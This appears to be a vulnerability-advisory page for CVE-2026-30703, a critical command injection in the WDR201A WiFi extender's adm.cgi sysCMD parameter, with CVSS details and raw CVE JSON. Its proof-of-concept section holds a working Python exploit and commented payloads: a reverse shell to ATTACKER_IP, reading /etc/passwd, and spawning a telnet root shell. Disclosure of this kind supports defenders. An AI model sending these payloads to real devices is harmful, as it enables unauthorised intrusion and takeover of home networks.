Security Vulnerability Report
CVE-2026-30703 CVSS 9.8 CRITICAL

CVE-2026-30703

Published: 2026-03-18 18:16:28
Last Modified: 2026-03-23 16:16:46

Description

A command injection vulnerability exists in the web management interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02). The adm.cgi endpoint improperly sanitizes user-supplied input provided to a command-related parameter in the sysCMD functionality.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WiFi Extender WDR201A Hardware V2.1
WiFi Extender WDR201A Firmware LFMZX28040922V1.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-30703 PoC - WiFi Extender WDR201A Command Injection
# Target: adm.cgi endpoint with sysCMD parameter
target_ip = "192.168.0.1"  # Replace with actual device IP
target_url = f"http://{target_ip}/adm.cgi"

# Payload to list all files and directories
payload = ";ls -la;"
params = {
    "sysCMD": payload
}

try:
    response = requests.get(target_url, params=params, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Status code: {response.status_code}")
    print(f"[*] Response preview: {response.text[:500]}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

# Additional payloads for testing:
# Reverse shell: ";bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1;"
# Read passwd: ";cat /etc/passwd;"
# Enable telnet: ";/usr/sbin/telnetd -l /bin/sh;"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30703", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.967", "lastModified": "2026-03-23T16:16:45.920", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in the web management interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02). The adm.cgi endpoint improperly sanitizes user-supplied input provided to a command-related parameter in the sysCMD functionality."}, {"lang": "es", "value": "Existe una vulnerabilidad de inyección de comandos en la interfaz de gestión web del Extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02). El endpoint adm.cgi sanitiza de forma inadecuada la entrada suministrada por el usuario proporcionada a un parámetro relacionado con comandos en la funcionalidad sysCMD."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": "https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}, {"url": 
"https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}